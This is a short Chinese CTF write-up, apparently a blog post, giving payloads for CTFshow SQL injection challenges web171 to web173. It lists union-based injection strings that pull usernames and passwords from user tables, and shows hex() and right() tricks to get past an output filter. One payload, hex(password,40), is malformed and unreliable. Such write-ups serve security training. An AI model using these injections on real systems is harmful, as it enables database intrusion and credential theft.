0
点赞
收藏
分享

微信扫一扫

[CTFSHOW]SQL注入训练


文章目录

  • ​​web171​​
  • ​​web172​​
  • ​​web173​​
  • ​​方法一​​
  • ​​方法二​​

web171

普通的sql注入,不做讲解
payload:​​​1' union select id,username,password from ctfshow_user1 -- -​

web172

普通的sql注入,不做讲解
payload:​​​1' union select id,username,password from ctfshow_user2 -- -​

web173

方法一

过滤了带有​​flag​​​的输出,可以转换为16进制输出
​​​1' union select id,hex(username),hex(password,40) from ctfshow_user3 -- -​

方法二

用​​right​​​函数
​​​1' union select id,hex(username),right(password,40) from ctfshow_user3 -- -​


举报

相关推荐

0 条评论